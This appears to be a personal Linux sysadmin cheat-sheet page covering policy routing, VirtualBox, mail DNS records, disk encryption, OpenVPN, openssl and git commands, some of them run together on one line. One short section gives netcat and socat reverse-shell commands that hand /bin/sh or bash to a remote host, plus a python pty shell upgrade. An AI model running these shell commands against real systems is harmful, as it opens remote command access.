Documentation
Linux Advanced Routing & TC: http://lartc.org/howto/index.html
Basic commands
I guess ifconfig is deprecated now…
Help:
ip a help
( a
=address l
=link r
=route )
Show:
ip a show eth0
ip l show eth0
ip r get 8.8.8.8
( use
ip -4
or -6
for ipv4/6 )
Change:
ip l set dev eth0 up
ip a add 192.168.1.2/24 dev eth0
.
Two Default Gateways
Useful to setup for hosts on multiple subnets/networks.
Howto’s:
- https://www.thomas-krenn.com/en/wiki/Two_Default_Gateways_on_One_System
- http://www.rjsystems.nl/en/2100-adv-routing.php
- https://kindlund.wordpress.com/2007/11/19/configuring-multiple-default-routes-in-linux/
- http://www.dfwavc.com/linux_multi_nic-multi_gateway
Instructions
Add table:
echo -e "10\trt2" >> /etc/iproute2/rt_tables
Add route/rule:
ip route add 1.2.3.0/20 dev eth1 src 1.2.3.172 table rt2 ip route add default via 1.2.3.1 dev eth1 table rt2 ip rule add from 1.2.3.172/32 table rt2 ip rule add to 1.2.3.172/32 table rt2 ip rule add from 1.2.3.173/32 table rt2 ip rule add to 1.2.3.173/32 table rt2 ip route flush cache ip route list table rt2 ip route show ip rule show
Testing:
ping -I 1.2.3.172 8.8.8.8
Making it permanent
debian:
/etc/interfaces
/etc/network/interfaces.d/eth1
post-up ip route add 1.2.3.0/20 dev eth1 src 1.2.3.174 table rt2
post-up ip route add default via 1.2.3.1 dev eth1 table rt2
post-up ip rule add from 1.2.3.174/32 table rt2
post-up ip rule add to 1.2.3.174/32 table rt2
/etc/network/interfaces.d/eth1:0
post-up ip rule add from 1.2.3.176/32 table rt2
post-up ip rule add to 1.2.3.176/32 table rt2
redhat:
echo "1.2.3.0/20 dev eth1 src 1.2.3.172 table rt2" >> /etc/sysconfig/network-scripts/route-eth1
echo "default via 1.2.3.1 dev eth1 table rt2" >> /etc/sysconfig/network-scripts/route-eth1
echo "from 1.2.3.172/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "to 1.2.3.172/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "from 1.2.3.173/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "to 1.2.3.173/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth
Tips & tricks
Guest clipboard:
/usr/bin/VBoxClient /usr/bin/VBoxClient --clipboard /usr/bin/VBoxClient --draganddrop
Resize VDI:
- SIZE_IN_MB would be 30000 for 30GB
- VBoxManage list hdds
Windows Host:
C:\Program Files\Oracle\VirtualBox\VboxManage.exe modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB
Mac Host:
# /Applications/VirtualBox.app/Contents/MacOS/VBoxManage modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB
Linux Host:
# VBoxManage modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB
Linux Guest: # resize2fs /dev/sda1
Compact disk
Windows Guest:
– Cleanup
– Defrag
– sdelete -z, sdelete -c
– shutdown
– VboxManage modifyhd –compact disk.vdi
Convert disk:
/usr/bin/VBoxClient --displayVBoxManage internalcommands converttoraw file.vdi file.raw
VBoxManage clonehd hdd.vdi hdd.img --format raw
convertfromraw
[--format VDI|VMDK|VHD]
[--variant Standard,Fixed,Split2G,Stream,ESX]
[--uuid ]
convertfromraw stdin
[--format VDI|VMDK|VHD]
[--variant Standard,Fixed,Split2G,Stream,ESX]
[--uuid ]
clonehd <uuid|inputfile> <uuid|outputfile>
[--format VDI|VMDK|VHD|RAW|]
[--variant Standard,Fixed,Split2G,Stream,ESX]
[--existing]
Autostop – Linux Host:
VBoxManage modifyvm VM [--autostop-type disabled|savestate|poweroff|acpishutdown]
VBoxManage modifyvm VM --autostop-type acpishutdown
Autostart init script:
From: https://forums.virtualbox.org/viewtopic.php?f=7&t=65194
Re: Autostart VM on debian 7.7 virtualbox 4.3.20
Post by lnunes_pt ยป 19. Dec 2014, 02:40
Hi PavloM,The answer to the first question is, NO, you need not login to host. But also, NO, you need not reboot host to test VMs starts.
The manual section 9.23.1 is not complete. Don’t use vbox.cfg for the configuration file name, otherwise setproperty autostartdbpath will lead to command syntax issues later.Just to be sure you know, the VirtualBox autostart service init script is specially used in cases where you have many users on the host and want to control who can autostart VMs upon boot.
If you’re the only user on the host its alo just simpler start any headless VM from /etc/rc.local.
Edit /etc/default/virtualbox
VBOXAUTOSTART_DB=/etc/vbox VBOXAUTOSTART_CONFIG=/etc/vbox/vboxautostart.cfg
Edit vboxautostart.cfg using Bob example how to deny all and allow bob:
default_policy = deny bob = { allow = true startup_delay = 10 }
Create the vboxautostart.cfg file. Add vboxusers group to /etc/vbox and sticky bit.
# chgrp vboxusers /etc/vbox # chmod 1775 /etc/vbox
Add vboxusers group to all users (of course).
Then Execute once as users:
$ VBoxManage setproperty autostartdbpath /etc/vbox
And for every VM to start, then you find under /etc/vbox, user.start file.
But also how it will stop, then you find under /etc/vbox, user.stop file.
$ VBoxManage modifyvm --autostart-enabled on $ VBoxManage modifyvm --autostop-type acpishutdown
Then test START and STOP as root without need of host reboot.
# /etc/init.d/vboxautostart-service start
Logon to the VM and test the shutdown next. You should get logged off for system shutdown:
# /etc/init.d/vboxautostart-service stop
Note The Virtualbox autostart script should exist /etc/init.d/vboxautostart-service (it can be downloaded from Source Code Repository: trunk -> src -> VBox -> Installer -> linux -> vboxautostart-service.sh)
Autostart delay:
VBoxManage modifyvm VMNAME --autostart-delay 10
Autostop – Windows Host:
- VmServiceTray: https://sourceforge.net/projects/vboxvmservice/
- Batch: https://git.io/v5qUP (run using Task Scheduler or gpedit > “Scripts Shutdown/Logoff” etc, untested)
- Python script: https://blog.ionelmc.ro/2014/01/04/virtualbox-vm-auto-shutdown/ (untested)
Display
VBoxManage controlvm VMNAME setvideomodehint 1680 975 16
(or 16/24/32)
Headless
VBoxManage startvm "VM" --type headless
Shares
Host: Share Folder (e.g. “foo”), Full Access (write)
Guest: # mkdir /mnt/foo; mount -t vboxsf ~/foo /mnt/foo
Mount VDI (NTFS)
Guest:
# modprobe nbd max_part=16 # qemu-nbd -c /dev/nbd0 image.vdi # mkdir /mnt/image; mount /dev/nbd0p2 /mnt/image
To remove:
# qemu-nbd -d /dev/nbd0
Prevent email-spoofing, phishing and spam by setting these DNS TXT Records.
Send Policy Framework (SPF):
domain.com. IN TXT "v=spf1 a mx include:domain.com ~all"
DomainKeys Identified Mail (DKIM):
Generate public/private key with opendkim-tools.
$ opendkim-genkey --bits=2048 --domain=domain.com --verbose
Use the private key for your mailserver, eg postfix.
Use public key for the TXT record (“1234+ABc/dEF
"):
_domainkey.domain.com. IN TXT "o=-" default._domainkey.domain.com. IN TXT "v=DKIM1; g=*; k=rsa; p=1234+ABc/dEF;"
Domain-based Message Authentication, Reporting and Conformance (DMARC):
_dmarc.domain.com IN TXT "v=DMARC1; p=reject; rua=mailto:[email protected]; ruf=mailto:[email protected]"
Testing:
- http://pastebin.com/kqGX2NGH (
dkim_verify.pl
) - https://mxtoolbox.com
- https://www.mail-tester.com
Quickfix issues
Restart:
gnome-keyring-daemon -r -d
If that doesn’t suffice, this extra steps might help:
pgrep -f gnome-keyring-daemon rm -rf ~/.cache/keyring-* setsid /usr/bin/gnome-keyring-daemon /dev/null 2>&1 ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROLA /usr/bin/gnome-keyring-daemon --start --components=pkcs11 /usr/bin/gnome-keyring-daemon --start --components=gpg /usr/bin/gnome-keyring-daemon --start --components=ssh
find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete
Oneliner to send email with attachment using sendmail:
$S Subject
$B Body
$A Attachment
man openssl | cat man -P cat openssl groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt
Before I chose to replace TrueCrypt with VeraCrypt I was looking for/comparing alternatives.
I also use Bitlocker and EFS that are included with Windows.
- BestCrypt
- CipherShed
- Free, Open Source
- Based on TrueCrypt
- https://www.ciphershed.org
- DiskCryptor
- Free, Open Source
- Windows only
- https://diskcryptor.net
- LibeCrypt
- Free, Open Source
- Windows only but supports dm-crypt/LUKS
- Uses unsigned drivers
- https://github.com/t-d-k/LibreCrypt
- Symantec Endpoint Encryption
- Paid
- Uses PGP
- https://www.symantec.com/endpoint-encryption
TrueCrypt- VeraCrypt
- Free, Open Source
- Based on TrueCrypt
- https://veracrypt.codeplex.com
- https://revlis.nl/2012/03/13/windows-7-backup-and-truecrypt
Except for DiskCryptor and LibreCrypt all these programs also run on Linux.
Linux Disk Encrption using Device Mapper, cryptsetup frontend and Linux Unified Key Setup LUKS (on disk format).
- dm-crypt:
- https://www.kernel.org/doc/Documentation/device-mapper/dm-crypt.txt
- https://gitlab.com/cryptsetup/cryptsetup/wikis/DMCrypt
- dmsetup
- cryptsetup and LUKS:
Setup:
cryptsetup -y -v luksFormat /dev/sdb1 cryptsetup luksOpen /dev/sdb1 foo cryptsetup status foo -v
Test:
cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1 cryptsetup isLuks /dev/sdb1 && echo IMaLUKS cryptsetup luksDump /dev/sdb1
Change:
(asks current passphase first)
cryptsetup -y luksChangeKey <target device> -S <target key slot number> cryptsetup -y luksChangeKey /dev/sdb1 -S 1
Or use gui gnome-disks:
- Disks (gnome-disks)
- 1.0TB Hard Disk
- Volumes: “Partition 1 1.0 TB LUKS”
- Cogs/wheels
Add/remove key:
sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION
Various:
dmsetup ls --tree lsblk lsblk --fs
USING NETCAT:
SERVER/LISTEN:
netcat -lvp 9999
CLIENT:
netcat -e /bin/sh host.name 9999
NICER SHELL:
python -c 'import pty; pty.spawn("/bin/bash")' ( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"
USING SOCAT:
SERVER/LISTEN:
socat file:`tty`,raw,echo=0 tcp-listen:8888
CLIENT:
socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane
CLIENT:
socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
export STY=
stty rows 40 cols 130
stty rows 40 cols 230
Install on CentOS6:
Required packages:
yum install -y fuse-2.8.3-5.el6.x86_64 yum install -y fuse-libs.x86_64 yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git yum install -y cmake
yum install -y boost-serialization.x86_64 yum install -y openssl-devel.x86_64 yum install -y rlog-devel.x86_64 yum install -y tinyxml2-devel.x86_64 yum install -y gettext-devel.x86_64
yum install -y centos-release-scl yum install -y devtoolset-3-gcc-c++ -y
Compile:
scl enable devtoolset-3 bash
git clone https://github.com/vgough/encfs
cd encfs mkdir build cd build cmake .. make make test make install make package
mkdir ~/test mkdir ~/Private
Test:
encfs ~/Private ~/test echo testing > ~/test/testfile
fusermount -u ~/test
OpenVPN Access Server is quite easy and fast to setup and includes a web gui.
Download:
- Server:
- All OpenVPN Access Server downloads come with 2 free client connections for testing purposes.
- https://openvpn.net/index.php/access-server/download-openvpn-as-sw/
- Client:
- Download “OpenVPN-Connect” from Server
- For Windows there’s also “OpenVPN-GUI” which comes included with the Installer:
- https://openvpn.net/index.php/open-source/downloads.html
- https://build.openvpn.net/downloads/snapshots/openvpn-install-master-xxx-x86_64.exe (supports newer functions like OTP)
Configuration:
Clickety click in the gui, plus some hardening:
Server:
Client:
auth SHA512 cipher AES-256-CBC
Connect with SSH + SOCKS Proxy + OTP:
$ ssh -D 1 to remote host
Ban user:
Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):
/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut
Re-admit a user who was previously banned:
/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut
Disconnect a user:
/usr/local/openvpn_as/scripts//sacli --user <USER> --key prop_deny --value true UserPropPut
Set client cert keysize:
/usr/local/openvpn_as/scripts/sa --keysize=4096 Init
Generating init scripts:
/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]
Google Authenticator:
Unlock a secret:
./sacli -u <USER> --lock 0 GoogleAuthLock
Lock a secret:
./sacli -u <USER> --lock 1 GoogleAuthLock
Generate a new, unlocked secret:
./sacli -u <USER> --lock 0 GoogleAuthRegen
Generate a new, locked secret:
./sacli -u <USER> --lock 1 GoogleAuthRegen
Enable Google Authenticator for all accounts:
./sacli --key vpn.server.google_auth.enable --value true ConfigPut
Enable for 1 user:
./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut
Disable:
./sacli --key vpn.server.google_auth.enable --value false ConfigPut
Disable for 1 user:
./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut
Revoke and reissue secret:
./sacli -u <USER> GoogleAuthRegen
Retrieve current user properties:
./confdba -us -p
Port sharing:
Advanced VPN Settings: port-share 127.0.0.1 10443
(tcp mode only)
List deleted open files (after update):
lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq
Generate CSR, self signed cert:
openssl genrsa -out rootCA.key 2048 openssl genrsa -des3 -out rootCA.key 2048 openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256
View CSR
openssl req -in file.csr -noout -text
View cert fingerprint
openssl x509 -fingerprint -noout -in file.crt -sha256 openssl x509 -fingerprint -noout -in file.crt -sha1 openssl x509 -fingerprint -noout -in file.crt -md5
View ciphers:
openssl ciphers -v 'TLSv1' | sort
Test ciphers:
openssl s_client -connect google.com:443 -cipher "EDH" openssl s_client -connect google.com:443 -cipher "RC4" openssl s_client -connect google.com:443 -tls1 openssl s_client -connect google.com:443 -tls1_1 openssl s_client -connect google.com:443 -tls1_2
echo -n | openssl s_client -connect google.com:443
nmap --script ssl-enum-ciphers -p 443
Get fingerprint from live SSL cert (IRC):
echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256 echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256
Show fingerprint:
openssl x509 -in cert.pem -fingerprint -noout
To change the password of your private key:
openssl rsa -des3 -in ca.key -out ca_new.key mv ca_new.key ca.key
Verifying that a Private Key Matches a Certificate
$ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\ openssl rsa -noout -modulus -in server.key | openssl md5
Get the MD5 fingerprint of a certificate using OpenSSL
openssl dgst -md5 certificate.der
Get the MD5 fingerprint of a CSR using OpenSSL
openssl dgst -md5 csr.der
Debug SMTP/STARTTLS:
openssl s_client -debug -starttls smtp -crlf -connect localhost:25
All of these are FUSE based except for eCryptfs.
Comparison: https://nuetzlich.net/gocryptfs/comparison
- CryFS:
- Works with cloud services like Dropbox, iCloud, OneDrive and others
- https://cryfs.org
- https://github.com/cryfs/cryfs
- https://revlis.nl/2016/11/25/cryfsr
- eCryptfs:
- Build into Linux kernel
- http://ecryptfs.org
- https://launchpad.net/ecryptfs/
- http://revlis.nl/2012/03/12/ecryptfs
- EncFS:
- Oldest (10 years)
- https://github.com/vgough/encfs
- http://revlis.nl/2016/11/25/encfs
- gocryptfs:
- Personal favorite
- https://nuetzlich.net/gocryptfs
- https://github.com/rfjakob/gocryptfs
- Windows: cppcryptfs (https://github.com/bailey27/cppcryptfs)
- KnoxCrypt
- Uses containers
- https://github.com/benhj/knoxcrypt
- SecureFS:
- Tahoe-LAFS:
- Also a distributed file system (“decentralized cloud storage”)
- https://tahoe-lafs.org
Download:
http://cryfs.org
https://github.com/cryfs/cryfs
Compile under CentOS 6:
yum install https://www.softwarecollections.org/repos/denisarnaud/boost157/epel-6-x86_64/noarch/denisarnaud-boost157-epel-6-x86_64-1-2.noarch.rpm yum install -y boost157-devel.x86_64 boost157-static.x86_64
scl enable devtoolset-3 bash
export BOOST_ROOT=/usr/include/boost157 export BOOST_LIBRARYDIR=/usr/lib64/boost157 mkdir cmake && cd cmake cmake .. make sudo make install
- Download dev snapshot:
- https://tartarus.org/~simon/putty-snapshots/putty-src.zip"
- https://tartarus.org/~simon/putty-snapshots/putty-src.zip.gpg
- https://tartarus.org/~simon/putty-snapshots/sha512sums
gpg --verify putty-src.zip.gpg putty-src.zip
grep $( sha512sum putty-src.zip ) sha512sums
- Run the compile.sh script below
#!/bin/sh
echo
echo "putty needs the following pkgs under cygwin64:"
echo "mingw64-x86_64-headers w32api w32api-headers"
echo
#export PERL5LIB=/usr/lib/perl5/5.22/CPAN
perl mkfiles.pl
sed -i.bak 's/^M//g' licence.h
make distclean
cd windows
make clean -f Makefile.mgw
make -j4 \
TOOLPATH="x86_64-w64-mingw32-" \
CFLAGS="-Wall -O2 -D_WINDOWS -DDEBUG -DWIN32S_COMPAT -D_NO_OLDNAMES -I.././ \
-I../charset/ -I../windows/ -I../unix/ \
-D_WIN32_IE=0x0500 \
-DWINVER=0x0500 -D_WIN32_WINDOWS=0x0410 -D_WIN32_WINNT=0x0500 \
-DNO_MANIFESTS" \
LDFLAGS="-s" \
RCFLAGS="--define WIN32=1 --define _WIN32=1 --define WINVER=0x0400 \
-I.././ -I../charset/ -I../windows/ -I../unix/" \
COMPAT="-DWINSOCK_TWO -DNO_MULTIMON" \
-f Makefile.mgw
It’s also possible to make with version variables:
make VER="-DSNAPSHOT=$(date '+%Y-%m-%d') -DSVN_REV='$(svnversion)' -DMODIFIED" TOOLPATH=i586-mingw32msvc- -f Makefile.cyg putty.exe
/etc/default/grub:
GRUB_CMDLINE_LINUX="video=off elevator=deadline console=tty0 console=ttyS0,115200" GRUB_TERMINAL=serial GRUB_SERIAL_COMMAND="serial --unit=0 --speed=115200 --stop=1"
/etc/inittab:
0:2345:respawn:/sbin/agetty -8 ttyS0 115200 vt100
Just a little cheatsheet… ;)
Start ssh-agent:
eval $( ssh-agent ) ssh-add /home/user/.ssh/id_ed25519_git ssh -T [email protected]
Now you should be able to “git push”
New repository, using SSH:
git push origin master git remote set-url origin [email protected]:username/repo.git git remote add origin [email protected]:username/repo.git git add . git commit -m "First commit"
To change commit comment:
git commit --amend
Branches:
Clone the repository:
git clone
List all branches:
git branch -a
Checkout the branch that you want:
git checkout my-patch
Adding branches:
git branch git checkout -b branchname git push origin branchname git remote add branchname [email protected]:username/repo.git git commit . git push branchname branchname
Switch between branches:
git checkout master
git checkout –
Remove remote (no really harmful):
git remote remove
More details about branches:
Update your branch when the original branch from official repository has been updated :
$ git fetch [name_of_your_remote]
Then you need to apply to merge changes, if your branch is derivated from develop you need to do :
$ git merge [name_of_your_remote]/develop
Delete a branch on your local filesystem :
$ git branch -d [name_of_your_new_branch]
To force the deletion of local branch on your filesystem :
$ git branch -D [name_of_your_new_branch]
Delete the branch on github :
$ git push origin :[name_of_your_new_branch]
Color:
git diff --color-words git log --color-words git show --color-words
Undo:
git checkout . # revert your changes git clean -fdxn # dry run git clean -xdf # delete untracked and ignored files (!!!)
SHA Hash:
git hash-object
(compare to:)
https://api.github.com/repos/user/repos/contents/file
https://api.github.com/repos/user/repos/bobs/hash
Removing sensitive data:
bfg --delete-files YOUR-FILE-WITH-SENSITIVE-DATA
bfg --replace-text passwords.txt
OR
git filter-branch --force --index-filter \ 'git rm --cached --ignore-unmatch PATH-TO-YOUR-FILE-WITH-SENSITIVE-DATA' \ --prune-empty --tag-name-filter cat -- --all
(add to .gitignore)
git push origin --force --all git push origin --force --tags git for-each-ref --format='delete %(refname)' refs/original | git update-ref --stdin git reflog expire --expire=now --all git gc --prune=now
Working state:
Use git stash when you want to record the current state of the working directory and the index, but want to go back to a clean working directory
git stash git stash list git stash show git stash show -p --color
(!) remove all states:
git stash clear
List remote:
git ls-remote $URL
Versioning:
short commit hash:
git rev-parse --short HEAD
git describe --tags --always --dirty=-dirty
Logs:
git log --graph --abbrev-commit --format=format:'%h - %s%d'
git log --oneline git log --pretty=oneline --abbrev-commit
git log --abbrev-commit git log -1 --abbrev-commit git log -1 --pretty=format:%h
WP-CLI: A command line interface for WordPress
Download from: https://wp-cli.org/
Configuration:
- /etc/sudoers.d/wp-cli:
- crontab:
You must be logged in to post a comment.